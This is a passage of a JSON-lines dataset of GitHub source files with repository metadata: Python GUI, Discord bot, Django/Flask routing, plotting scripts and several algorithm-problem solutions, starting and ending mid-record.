sitUpLabel.destroy()\r\n sqautsResult.destroy()\r\n pushUpResult.destroy()\r\n sqautsResult.destroy()\r\n filler2.destroy()\r\n beginButton.destroy()\r\n logoutButton.destroy()\r\n\r\n showHome()\r\n\r\n canvas = Canvas(root, width=700, height=400, bg=\"#434343\", highlightthickness=0)\r\n canvas.grid(columnspan=3)\r\n canvas.config(height=300)\r\n\r\n\r\n # Logo Label #\r\n logo = ImgTk.PhotoImage(file = 'logo4.png')\r\n logoLabel = Label(image=logo)\r\n logoLabel.image = logo\r\n logoLabel.config(border=False)\r\n logoLabel.grid(columnspan=3, column=0, row=0, pady=0)\r\n\r\n\r\n # Output1 Label #\r\n output1 = Label(root, text=\"Great Job, [Insert Name]!\", font=(\"Arial\",25), fg=\"#FFFFFF\", bg=\"#434343\")\r\n output1.grid(columnspan=3, column=0, row=1, padx=0)\r\n\r\n # Filler Space #\r\n filler1 = Label(root, text=\"!!!!!!!!!!!!!!!!!!!!!!!!!\", font=\"Arial\", fg=\"#434343\", bg=\"#434343\")\r\n filler1.grid(columnspan=3, column=0, row=2)\r\n\r\n # Output2 Label #\r\n output2 = Label(root, text=\"You completed the following number of exercises:\", font=(\"Arial\",15), fg=\"#FFFFFF\", bg=\"#434343\")\r\n output2.grid(columnspan=3, column=0, row=3, padx=0)\r\n\r\n\r\n # Results Label #\r\n squatsLabel = Label(root, text=\"Squats:\", font=(\"Arial\",25), fg=\"#FFFFFF\", bg=\"#434343\")\r\n squatsLabel.grid(columnspan=2, column=0, row=4, padx=(30,0))\r\n\r\n pushUpLabel = Label(root, text=\"Push-Up:\", font=(\"Arial\",25), fg=\"#FFFFFF\", bg=\"#434343\")\r\n pushUpLabel.grid(columnspan=2, column=0, row=5, padx=(0,0))\r\n\r\n sitUpLabel = Label(root, text=\"Sit-Up:\", font=(\"Arial\",25), fg=\"#FFFFFF\", bg=\"#434343\")\r\n sitUpLabel.grid(columnspan=2, column=0, row=6, padx=(40,0))\r\n\r\n\r\n sqautsResult = Label(root, text=\"500\", font=(\"Arial\",25), 
fg=\"#FFFFFF\", bg=\"#434343\")\r\n sqautsResult.grid(columnspan=3, column=1, row=4)\r\n\r\n pushUpResult = Label(root, text=\"50\", font=(\"Arial\",25), fg=\"#FFFFFF\", bg=\"#434343\")\r\n pushUpResult.grid(columnspan=3, column=1, row=5)\r\n\r\n sitUpResult = Label(root, text=\"5000\", font=(\"Arial\",25), fg=\"#FFFFFF\", bg=\"#434343\")\r\n sitUpResult.grid(columnspan=3, column=1, row=6)\r\n\r\n\r\n # Filler Space #\r\n filler2 = Label(root, text=\"!!!!!!!!!!!!!!!!!!!!!!!!!\", font=\"Arial\", fg=\"#434343\", bg=\"#434343\")\r\n filler2.grid(columnspan=3, column=0, row=7)\r\n\r\n\r\n # Begin Exercise Button #\r\n beginButton = Button(root, text=\"Begin Exercise\", font=\"Arial\", height=2, width=13, bg=\"#6aa84f\", command=startThread)\r\n beginButton.grid(columnspan=2, column=0, row=8, pady=(30,30))\r\n\r\n\r\n # Logout Button #\r\n logoutButton = Button(root, text=\"Logout\", font=\"Arial\", height=2, width=13, bg=\"#6aa84f\", command=toHomefromResults)\r\n logoutButton.grid(columnspan=2, column=1, row=8, pady=(30,30))\r\n\r\n\r\nroot = Tk()\r\n\r\nroot.title(\"VizFit Exercise Application\")\r\nroot.config(bg=\"#434343\")\r\nroot.resizable(False, False) \r\ncanvas = Canvas(root, width=700, height=400, bg=\"#434343\", highlightthickness=0)\r\ncanvas.grid(columnspan=3)\r\n\r\n\r\nshowHome()\r\n\r\n\r\nroot.mainloop()","repo_name":"NoahB7/CS4023-SeniorCapstone-VizFitComputerVisionFitness","sub_path":"Exercise GUI.py","file_name":"Exercise GUI.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39816295266","text":"nums = []\r\nfor _ in range(int(input())):\r\n num = int(input())\r\n if num >= 0:\r\n nums.append(num)\r\nnums.sort()\r\n\r\nans = 0\r\nfor num in nums:\r\n if num != ans:\r\n break\r\n ans += 1\r\nprint(ans)","repo_name":"juwkim/boj","sub_path":"백준/Silver/18295. Ants/Ants.py","file_name":"Ants.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"7867703267","text":"#! 
python3\nfrom discord.ext import commands\nimport discord\n# import youtube_dl\nimport os\nfrom helpers import fun_helper as fun\nfrom dotenv import load_dotenv\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\n\ninitial_extensions = ['cogs.buzzle', 'cogs.fun', 'cogs.puzzlehunt', 'cogs.music']\nintents = discord.Intents.all()\nintents.members = True\nbot = commands.Bot(command_prefix='!', intents=intents)\n\n# if __name__ == '__main__':\n# for extension in initial_extensions:\n# bot.load_extension(extension)\n# bot.help_command.cog = bot.cogs[\"Misc\"]\n\n@bot.event\nasync def setup_hook():\n for extension_cog in initial_extensions:\n await bot.load_extension(extension_cog)\n # await bot.load_extension('cogs.fun')\n # await bot.load_extension('cogs.buzzle')\n # await bot.load_extension('cogs.puzzlehunt')\n # await bot.load_extension('cogs.music')\n\n bot.help_command.cog = bot.cogs[\"Misc\"]\n\n\n@bot.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(bot))\n await bot.change_presence(activity=discord.Game(name=\"東方Project | /help\"))\n\n\n@bot.event\nasync def on_message(message):\n if message.author == bot.user:\n return\n if message.content.lower() == 'fruce?':\n await message.channel.send('fruce?')\n if message.content.lower() == 'hotel?':\n await message.channel.send('Trivago.')\n if message.content.lower() == 'sus?':\n await message.channel.send('amogus')\n if message.content.lower() == 'cbt':\n await message.channel.send(fun.cbt())\n if message.content.lower().startswith('hmm'):\n emoji = ''\n await message.add_reaction(emoji)\n if message.content.lower().endswith('solved') and message.content[0] != \"!\":\n emoji = ''\n await message.channel.send(emoji)\n if message.content.lower().startswith('ayaya'):\n emoji = '<:ayayaya:831793340835037184>'\n await message.channel.send(emoji)\n if message.content.lower().startswith('pog'):\n emoji = '<:mokoupoggers:831897999146745938>'\n await message.channel.send(emoji)\n if message.content.lower().startswith('awoo'):\n emoji = '<:awoo:835499877185486848>'\n await message.channel.send(emoji)\n if message.content.lower() == 'le':\n emoji = '<:LeSanae:844559050272145440>'\n await message.channel.send(emoji)\n if message.content.lower().startswith('pekoggers'):\n emoji = '<:pekoggers:844575409798250516>'\n await message.channel.send(emoji)\n\n if message.content.lower() in ['penis music', 'benis music', '🅱️enis music']:\n await message.channel.send('https://www.youtube.com/watch?v=c4KNd0Yv6d0')\n song_there = os.path.isfile(\"song.mp3\")\n try:\n if song_there:\n os.remove(\"song.mp3\")\n except PermissionError:\n await message.channel.send(\"Wait for the current playing music to end\")\n return\n voice = discord.utils.get(bot.voice_clients, guild=message.guild)\n voiceChannel = message.author.voice.channel\n if voice is None:\n await voiceChannel.connect()\n voice = discord.utils.get(bot.voice_clients, guild=message.guild)\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n }\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download(['https://www.youtube.com/watch?v=c4KNd0Yv6d0'])\n for file in os.listdir(\"./\"):\n if file.endswith(\".mp3\"):\n os.rename(file, \"song.mp3\")\n voice.play(discord.FFmpegPCMAudio(\"./song.mp3\"))\n\n await 
bot.process_commands(message)\n\n\nbot.run(TOKEN)\n","repo_name":"Shazamed/Patchouli","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27481391661","text":"# https://leetcode.cn/problems/he-wei-sde-lian-xu-zheng-shu-xu-lie-lcof/\r\n\r\ndef findContinuousSequence(target):\r\n ans = []\r\n i, j = 1, 2\r\n while i < j:\r\n sum = (i + j) * (j - i + 1) / 2\r\n if sum < target:\r\n j += 1\r\n elif sum > target:\r\n i += 1\r\n else:\r\n res = []\r\n for k in range(i, j+1):\r\n res.append(k)\r\n ans.append(res)\r\n i += 1\r\n return ans\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(findContinuousSequence(9))","repo_name":"An-Yuhang-ace/DataStructureAndAlgrithms","sub_path":"04_DoublePointers/findContinuousSequence.py","file_name":"findContinuousSequence.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"39196183017","text":"# @File: 3\n# @Author: Kevin Huo\n# @LastUpdate: 8/16/2020 1:07 PM\n\nfrom typing import List\n\n\nclass Solution:\n def maxDistance(self, position: List[int], m: int) -> int:\n \"\"\"\n https://leetcode-cn.com/problems/magnetic-force-between-two-balls/\n\n 二分法\n\n 步骤:\n 1 - 首先, 对 position 排序\n 2 - 第一项 和 最后一项 肯定要选, 这样就已经消耗了 2 颗球了. 所以我们在核心算法中:\n 2.1 如果 m<=2 那么直接返回 最后一项 - 第一项 的差,就是结果. 换句话说,把2个球放2边,它们之间的距离肯定最大呀.\n 2.2 如果 m>2 那么在核心算法中,我们只需要处理剩下的 m-2 颗球.\n 3 - 最大间隔 = (7 - 1) // (球数-1) = 6 // 2 = 3\n 为什么要先求出这个 最大间隔呢? 而且为什么是用上面这个公式求呢? 你这样想:\n 3.1 假设我们给定一个有序数组 arr = [1, 2, 3, 4, 5, 6, 7], 给定m=3, 首先,有两个球的位置已经固定了,分别是 arr[0] = 1 和 arr[5] = 6\n 3.2 然后,我们只需要考虑最后一个球放在哪里。\n 3.3 因为数组很短,所以我们可以在每个地方都放一次,试试哪种放置方法,可以让间隔最大。 注意,因为 开头和末尾的位置\n 已经被占用了,所以我们只能考虑 [2, 3, 4, 5, 6] 这个子数组:\n A - 放在 2 处, 那么整个数组就被分成了 1~2 和 2~7, 那么间隔分别是 1 和 5 >> 这种放置方法的最小的最大间隔是 1.\n B - 放在 3 处,数组被分成 1~3 和 3~7, 间隔分别是 2 和 4 >> 最小的最大间隔是 2\n C - 放在 4 处, 数组被分成 1~4 和 4~7, 间隔分别是 3 和 3 >> 最小的最大间隔是 3\n D - 放在 5 处, 数组被分成 1~5 和 5~7, 间隔分别是 4 和 2 >> 最小的最大间隔是 2\n E - 放在 6 处, 数组被分成 1~6 和 6~7, 间隔分别是 5 和 1 >> 最小的最大间隔是 2\n 综上,C 方案获胜。而且o我们可以发现当我们吧球放的离中心越近,最小的最大间隔就越大,这也说明一个问题:\n 这道题,我们要将球摆放的约平均,也就是说每个球之间的间隔约相近,最终的结果就越好。这个很容易理解,因为我们最后\n 求的,是一个\"最小的\"最大间隔,也就是说,不管你别的有多大,我只看你最小的那个。所以,我们要保证每一个间隔都不能\n 太小,所以,平均的放置就是最好的办法。\n 4 - 解释到这里,相信你应该明白我们为什么要先求出一个 “理论上最大的 最小间隔”,因为,我们摆球的时候,要用到2分法,而这个理论\n 的最大值,就是我们每次正在摆一颗球的时候,在二分搜索范围我们要遍历每一项,并且判断是否将当前的球摆在这,那么如何判断呢?\n 就要用到这个理论的最大值了。 换句话说,举个例子:\n 4.1 已知一个排序数组 arr = [1, 2, 3, 4, 7], 而且已知 m = 3\n 4.2 先把前两个球摆好,分别放在 arr[0](开头) 和 arr[-1] (末尾)的位置.\n 4.3 现在开始用二分法,摆最后一颗球。\n 4.4 摆之前,如我们所说,先求出 “理论上的最大值”,也就是 (7 - 1)//(3-1) = 6//2 = 3\n 4.5 也就是说,理论上,两颗球之前最大的 最小间隔,不可能超过 3.\n 4.6 那么,我们来进行二分法,并且利用这个 \"理论上最大的最小间隔,即3\" 来作为一颗球是否应该放在某个位置的判断依据。\n 以下是2分法的步骤:\n arr = [1, 2, 3, 4, 7]\n a - 初始化3个索引值:\n left = 1\n right = len(arr) - 2\n mid = (left + right) // 2\n (为什么左右是1和 len-1你?因为我之前说了,开头0 和 末尾 len-1 已经被2个球占了,所以2分法只在剩下的子数组中进行\n 而子数组的就是arr 去头去尾,所以初始化的Left不是0而是1,right不是len-1而是 len-2)\n b - 初始化完成后, 我们的中间索引是 2, 所以 arr[2] = 3\n c - 我们的第一次二分搜索范围,是从 arr[left] 到 arr[right], 即 [2, 3, 4] 这个数组.\n d - 我们将上面求出的 \"最大间隔\", 和左侧最近的球的索引相加,得到 3 + arr[0] = 3+1=4\n e - 我们用这个求出的值 4, 和 arr[mid] 比较, 结果是 4 > arr[mid](即arr[2]=3), 所以,我们只在二分范围的右半边搜索. 
(也就是只搜索右半边 [3, 4])\n f - 在这个范围内,从左到右遍历 [3, 4] 的每一项, 并且将当前项和 “理论上最大的最小间隔, 即 3+(距离最近的左边的一颗球的值)”进行比较:\n 注意,因为当前距离最近的左侧的球时 arr[0] = 1, 所以要比较的标准值=3+1 = 4, 也就是说,判断 [2, 3, 4]中的每一项是否 <4\n d-1 当前项arr[2] = 3, 它 < 4, 所以说明: 暂时不用把球放在这里,还可以继续往后移.\n d-3 当前项arr[3] = 4, 它 == 4, 所以说明: 这个球就是当前能选择的最优解了,必须把这颗球放在这里,为什么呢?因为\"理论上最大的间隔就是3\",如果你放在\n 当前的位置,就已经达到最大值了,你就算再往右移动,造成的结果也只是让后面的球之间的间隔变得更小,没有用。\n 所以,把当前球放在这里。\n (这次二分搜索到此结束)\n 4.7 我们在上面的步骤中,通过1次二分法,成功的放置了一颗球,但是我们可能有很多球,所以我们在做完一次二分搜索后,要\n 做一些后续步骤,来更新一些变量,并且做一些判断,来决定是否需要继续二分搜索,还是可以直接返回结果了呢?\n a - 我们每做一次2分法,必定要放一颗球,所以,每次二分法开始前,我们可以 m -= 1\n b - 在一次二分法结束后,我们判断 m是否为0:\n >> 若为0,则说明没有球可以放了,直接范湖结果即可,结束算法。\n >> 若不为0, 则说明还有球需要放,那我们更新以下参数,为下一次的二分法做准备:\n 1 - 我们要记录一个 \"距离当前搜索范围最近的一个 左侧的球的值\", 刚开始的时候,这个值初始化=arr[0]=1\n 第一次二分结束后,假设我们把球放在了 arr[3]=4的位置上,那我们把这个值更新成 4.\n (PS: 为什么需要这个值呢?因为我们在二分搜索中遍历每一项的时候,比较的基准值= 理论最大间隔+上面这个值\n 比如第一次二分法,我们遍历时,比较的基准值= 最大间隔+这个值 = 3+arr[0] = 3 + 1 = 4\n 因为我们只有3个球,所以只用一次二分法就够了,假如哦们还要做一次二分法的话,下一次遍历时,作为判断\n 依据的基准值,应该就变成了 理论最大间隔+更新后的上面提到的值 = 3+arr[3] = 3+4 = 7.\n 以此类推.\n )\n 2 - 二分搜索的 3 个索引都要更新:\n left = 上一次二分法中 放球的位置索引 + 1\n (举例,我们第一次,也是唯一的一次微分搜索中,放置球的索引是arr[3], 那么,这次二分结束后,我们将\n left 的值更新为 3+1 = 4, 也就是说,下次二分搜索将从 arr[4] 开始)\n\n right 不变\n\n mid = (left + right) // 2\n\n\n\n \"\"\"\n # 1 排序\n position = sorted(position)\n lenPos = len(position)\n\n # 2\n if m == 2:\n print(position[-1] - position[0])\n return position[-1] - position[0]\n\n # 3 核心代码, 处理剩下的 m-2 颗球\n # 求出理论上最大的 最小间隔\n max_min_distance = (position[-1] - position[0]) // (m - 1)\n\n # 求出理论上最小的最小间隔\n min_min_distance = min([position[i + 1] - position[i] for i in range(lenPos - 1)])\n if lenPos == m:\n return min_min_distance\n\n # 不用二分,就用最简单的从左到右的遍历实现\n balls = [position[0], position[-1]]\n latest_left_ball_value = position[0]\n count = m - 2\n start, end = 1, lenPos - 1\n while count > 0:\n count -= 1\n for i in range(start, end):\n curr = position[i]\n # 当且仅当 curr == max_min_distance + latest_left_ball_value 时候,直接将球放下\n if curr == max_min_distance + latest_left_ball_value:\n latest_left_ball_value = position[i]\n balls.append(latest_left_ball_value)\n start = i + 1\n break\n if curr < max_min_distance + latest_left_ball_value:\n # 贪心,不放球,还可以继续右移\n continue\n if curr > max_min_distance + latest_left_ball_value:\n # 已经超了,这里判断 i 是否是start:\n if i == start:\n # 放球\n latest_left_ball_value = position[i]\n balls.append(latest_left_ball_value)\n start += 1\n break\n # 如果不是,那么去前一个值, 因为前一个值肯定没超过理论的最大值\n latest_left_ball_value = position[i - 1]\n balls.append(latest_left_ball_value)\n start = i + 1\n break\n balls.sort()\n print(balls)\n lenBalls = len(balls)\n res = min([balls[i + 1] - balls[i] for i in range(lenBalls - 1)])\n print(\"res = %s\" % res)\n return res\n\n # todo 一下二分的思路,以后实现\n # # 开始第一次二分法, 初始化一些值\n # left = 1\n # right = lenPos - 2\n # latest_left_ball_value = position[0]\n #\n # # 一共需要执行 m-2 次二分搜索\n # count = m - 2\n # while left <= right:\n # count -= 1\n # mid = (left + right) // 2\n # check_standard = max_min_distance + latest_left_ball_value\n #\n # # 遍历搜索范围内的每一项,并且和 基准值比较\n # # 如果数组值 > 基准值: 结束遍历, 去当前项的前一项, 因为当前项已经超过理论最大值了.\n # # 如果数组值 < 基准值: 继续往右移动, 因为当前项还没有到达理论最大值,还可以再贪一步.\n # # 如果数组值 = 基准值: 结束遍历,将球放在当前位置,更新参数,准备进行下一次二分搜索.\n # # 先用 arr[mid] 和 check_standard 比较,来确认搜索左半边 (left - mid) 还是 右半边 (mid - right)\n\n\nif __name__ == '__main__':\n # 答案 = [3, 999999999, 2, 45, 5, 7]\n\n tests = [\n {\"position\": [1, 2, 3, 4, 7], \"m\": 3},\n {\"position\": [5, 4, 3, 2, 1, 1000000000], \"m\": 2},\n {\"position\": [1, 2, 3, 5, 7], \"m\": 3},\n {\"position\": [10, 12, 14, 17, 25, 27, 31, 33, 46, 
55, 60, 70, 71, 88, 100], \"m\": 3},\n {\"position\": [79, 74, 57, 22], \"m\": 4},\n # 下面这个题打错了,我的答案是6,正确答案是7\n {\"position\": [82, 68, 79, 17, 70, 51, 5, 46, 27, 44, 39, 57, 94, 45, 88, 56], \"m\": 9}\n ]\n question_index = int(input(\"please type question index: \"))\n t = tests[question_index - 1]\n s = Solution()\n r = s.maxDistance(**t)\n","repo_name":"kehuo/algorithm_py3","sub_path":"lc/2020/August_16_case_202/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":12321,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"14202505177","text":"from django.conf.urls import patterns, url, include\r\nfrom django.views.generic import ListView, DetailView\r\nfrom jordsengine.models import Post, Category, Tag\r\nfrom jordsengine.views import CategoryListView, TagListView, PostsFeed, CategoryPostsFeed, TagPostsFeed\r\nfrom django.contrib.sitemaps.views import sitemap \r\nfrom jordsengine.sitemap import PostSitemap, FlatpageSitemap\r\nfrom django.contrib.flatpages import views\r\n\r\n# Sitemaps\r\nsitemaps = {\r\n 'posts': PostSitemap,\r\n 'pages': FlatpageSitemap\r\n}\r\n\r\nurlpatterns = patterns('',\r\n\r\n\t# Index\r\n\turl(r'^(?P\\d+)?/?$', ListView.as_view(\r\n\t\tmodel=Post,\r\n\t\tpaginate_by=3,\r\n queryset=Post.objects.filter(published=True),\r\n\t\t), name ='index'),\r\n\r\n\t# Individual posts\r\n url(r'^(?P\\d{4})/(?P\\d{1,2})/(?P[a-zA-Z0-9-]+)/?$', DetailView.as_view(\r\n model=Post,\r\n queryset=Post.objects.filter(published=True),\r\n ), name='post'),\r\n\r\n # Categories\r\n url(r'^category/(?P[a-zA-Z0-9-]+)/?$', CategoryListView.as_view(\r\n paginate_by=20,\r\n model=Category,\r\n ), name= 'category'),\r\n\r\n # Tags\r\n url(r'^tag/(?P[a-zA-Z0-9-]+)/?$', TagListView.as_view(\r\n paginate_by=20,\r\n model=Tag,\r\n ), name='tag'),\r\n\r\n\r\n # Post RSS feed\r\n url(r'^feeds/posts/$', PostsFeed()),\r\n\r\n # Category RSS feed\r\n url(r'^feeds/posts/category/(?P[a-zA-Z0-9-]+)/?$', CategoryPostsFeed()),\r\n\t\r\n # Tag RSS feed\r\n url(r'^feeds/posts/tag/(?P[a-zA-Z0-9-]+)/?$', TagPostsFeed()),\r\n\r\n # Search posts\r\n url(r'^search', 'jordsengine.views.getSearchResults', name='search'),\r\n \r\n # Sitemap\r\n url(r'^sitemap\\.xml$', sitemap, {'sitemaps': sitemaps},\r\n name='django.contrib.sitemaps.views.sitemap'),\r\n\r\n )\r\n\r\n","repo_name":"jordburns/boleynworkshop","sub_path":"jordsengine/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9775728271","text":"from src import APP\nfrom src.event_apis import API_ROUTES as EVENT_API_ROUTES\n\n\nfunc_based_routes = ''\n\nclass_based_routes = EVENT_API_ROUTES\n\n\ndef configure_app_routes():\n for route in func_based_routes:\n api_url = route[0]\n handler = route[1]\n methods = route[2]\n APP.add_url_rule(api_url, \"{}|{}\".format(route, handler), handler, methods=methods)\n\n for route in class_based_routes:\n api_url = route[0]\n methods = route[1]\n view_function = route[2]\n APP.add_url_rule(api_url, methods=methods, view_func=view_function)\n","repo_name":"raghav1010/TrackXpress","sub_path":"src/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19598564478","text":"import csv\nimport matplotlib.pyplot as plt\nf = open('card.csv')\ndata = csv.reader(f)\nnext(data)\ndata = list(data)\n\ndeli = [0, 
0, 0]\ntaxi = [0, 0, 0]\nfor row in data:\n if row[-1] == '전표매입' and row[5] == '(주)우아한형제들':\n mon, payment = int(row[0].split('-')[1]), int(row[-3])\n idx = mon - 10\n deli[idx] += payment\n if row[-1] == '전표매입' and '택시' in row[5]:\n mon, payment = int(row[0].split('-')[1]), int(row[-3])\n idx = mon - 10\n taxi[idx] += payment\n\n\nplt.rc('font', family = 'AppleGothic')\nplt.title('10월 ~ 12월 배달 지출 현황')\nplt.plot(['10월', '11월', '12월'], deli, color = 'red', label = '배달음식 지출액');\nplt.plot(['10월', '11월', '12월'], taxi, color = 'indigo', label = '택시비 지출액');\nplt.legend()\nplt.show()","repo_name":"bn-tw2020/PythonTutorial","sub_path":"day8/day8_3.py","file_name":"day8_3.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74628332085","text":"#Crie um programa onde 4 hogadores joguem um dado e tenham resultados\n#aleatórios. Guarde esses resultados em um dicionário. No final, \n#coloque esse dicionário em ordem, sabendo que o vencedor tirou o \n#maior número no dado.\n\nfrom random import randint\nfrom operator import itemgetter\n\ndicionario = {}\nranking = {}\n\nfor c in range(1, 5):\n dicionario[f'Jogador {c}'] = randint(1,6)\n\nranking = sorted(dicionario.items(), key=itemgetter(1), reverse = True)\n\nprint(ranking)","repo_name":"CezarMontenegro/python-exercises","sub_path":"desafio091.py","file_name":"desafio091.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"845813208","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom drf_spectacular.views import SpectacularAPIView, SpectacularRedocView, SpectacularSwaggerView\n\nfrom apps.accounts.views import CustomAuthToken\nfrom config.api_docs import urlpatterns as api_docs_urlpatterns\n\nurlpatterns = api_docs_urlpatterns + [\n path('admin/', admin.site.urls),\n path('api/v1/', include(\"apps.core.urls\")),\n path('api/v1/', include(\"apps.cards.urls\")),\n path('api/v1/', include(\"apps.enemies.urls\")),\n path('accounts/', include(\"apps.accounts.urls\")),\n path('api/v1/', include(\"apps.user_database.urls\")),\n path('accounts/api-token-auth/', CustomAuthToken.as_view()),\n path('api/v1/', include(\"apps.news.urls\")),\n # YOUR PATTERNS\n path('api/schema/', SpectacularAPIView.as_view(), name='schema'),\n # Optional UI:\n path('api/schema/swagger-ui/',\n SpectacularSwaggerView.as_view(url_name='schema'), name='swagger-ui'),\n path('api/schema/redoc/', SpectacularRedocView.as_view(url_name='schema'),\n name='redoc'),\n\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"apodisation13/cardgame","sub_path":"backend/config/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38889878035","text":"import segm.utils.torch as ptu\nfrom torchvision import transforms\n\nfrom segm.data import ImagenetDataset\nfrom segm.data import ADE20KSegmentation\nfrom segm.data import PascalContextDataset\nfrom segm.data import Pascal5iDataset\nfrom segm.data import CityscapesDataset\nfrom segm.data import Loader\n\n\ndef create_dataset(dataset_kwargs):\n dataset_kwargs = dataset_kwargs.copy()\n dataset_name = dataset_kwargs.pop(\"dataset\")\n batch_size = 
dataset_kwargs.pop(\"batch_size\")\n num_workers = dataset_kwargs.pop(\"num_workers\")\n split = dataset_kwargs.pop(\"split\")\n fold = dataset_kwargs.pop(\"fold\")\n shot = dataset_kwargs.pop(\"shot\")\n\n # load dataset_name\n if dataset_name == \"imagenet\":\n dataset_kwargs.pop(\"patch_size\")\n dataset = ImagenetDataset(split=split, **dataset_kwargs)\n elif dataset_name == \"ade20k\":\n dataset = ADE20KSegmentation(split=split, **dataset_kwargs)\n elif dataset_name == \"pascal_context\":\n dataset = PascalContextDataset(split=split, **dataset_kwargs)\n elif dataset_name == \"pascal5i\":\n datapath = r'/home/prlab/wxl/dataset/dir/pcontext/VOCdevkit'\n img_mean = [0.485, 0.456, 0.406]\n img_std = [0.229, 0.224, 0.225]\n im_size = dataset_kwargs.pop(\"image_size\")\n transform = transforms.Compose([transforms.Resize(size=(im_size, im_size)),\n transforms.ToTensor(),\n transforms.Normalize(img_mean, img_std)])\n use_original_imgsize = False\n dataset = Pascal5iDataset(datapath,fold,transform,split,shot,use_original_imgsize)\n elif dataset_name == \"cityscapes\":\n dataset = CityscapesDataset(split=split, **dataset_kwargs)\n else:\n raise ValueError(f\"Dataset {dataset_name} is unknown.\")\n\n dataset = Loader(\n dataset=dataset,\n batch_size=batch_size,\n num_workers=num_workers,\n distributed=ptu.distributed,\n split=split,\n )\n return dataset\n","repo_name":"TrellixVulnTeam/fssegmenter_L783","sub_path":"segm/data/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23360091146","text":"import matplotlib.pyplot as plt\nfrom mpldatacursor import datacursor\nfrom change_statistics import IntervalDataSink\n\n\nclass StatusInformationPlot(IntervalDataSink.IntervalDataSink):\n\n def __init__(self):\n super(StatusInformationPlot, self).__init__()\n self.timepoints = []\n self.worldFullTimeTicks = []\n self.loaded_chunks = []\n self.changed_chunks = []\n self.tile_entities = []\n self.changed_tile_entities = []\n self.entities = []\n self.changed_entities = []\n self.online_players = []\n self.diff_times = [] # ms\n\n\n def receiveIntervalData(self, intervalData):\n for entry in intervalData.status_entries:\n self.timepoints.append(entry[\"logTime\"])\n self.worldFullTimeTicks.append(entry[\"worldFullTime\"])\n self.loaded_chunks.append(entry[\"loadedChunks\"])\n self.changed_chunks.append(entry[\"changedChunks\"])\n self.tile_entities.append(entry[\"tileEntities\"])\n self.changed_tile_entities.append(entry[\"changedTileEntities\"])\n self.entities.append(entry[\"entities\"])\n self.changed_entities.append(entry[\"changedEntities\"])\n self.online_players.append(entry[\"onlinePlayers\"])\n self.diff_times.append(entry[\"totalStateDiffTime\"])\n\n\n def noMoreIntervals(self):\n fig, ax = plt.subplots()\n ax.plot(self.timepoints, self.loaded_chunks, label='#loaded chunks', linestyle=\"-\", color='g')\n\n ax.plot(self.timepoints, self.tile_entities, label='#tile entities', color='orange')\n ax.plot(self.timepoints, self.entities, label='#entities', color='red')\n #ax.plot(self.timepoints, self.changed_entities, label='#changed entities', linestyle='--', color='red')\n\n ax.plot(self.timepoints, self.diff_times, label='#time for statediff [ms]', color='black')\n\n ax2 = ax.twinx()\n ax2.plot(self.timepoints, self.online_players, label='#online players', color='b')\n #ax2.plot(self.timepoints, self.changed_chunks, label='#changed chunks', linestyle='--', 
color='g')\n #ax2.plot(self.timepoints, self.changed_tile_entities, label='#changed tile entities', linestyle='--', color='orange')\n\n # fix legend\n # lines, labels = ax.get_legend_handles_labels()\n # lines2, labels2 = ax2.get_legend_handles_labels()\n # ax.legend(lines + lines2, labels + labels2, loc=2)\n ax.legend(loc=2) # upper left\n ax2.legend(loc=1) # upper right\n\n ax.set(xlabel='Time', title='Status information')\n ax.grid()\n datacursor()\n plt.show()","repo_name":"phylib/MinecraftNDN-RAFNET19","sub_path":"gamestate-changes/change_statistics/intervalDataSinks/plotStatusInformation.py","file_name":"plotStatusInformation.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"5325940964","text":"class Solution:\n def isPalindrome(self, A, i, j):\n while i >= 0 and j < len(A) and A[i] == A[j]:\n i -= 1\n j += 1\n\n if self.mx < j - i - 1:\n self.mx = j - i - 1\n self.start = i + 1\n\n\n def longestPalindrome(self, A):\n self.mx = 1\n self.start = 0\n n = len(A)\n\n if n < 2:\n return A\n\n for i in range(n):\n self.isPalindrome(A, i, i)\n self.isPalindrome(A, i, i+1)\n\n return A[self.start:self.start+self.mx]\n\n\nif __name__ == '__main__':\n A = \"aacabakaca\"\n B = Solution()\n 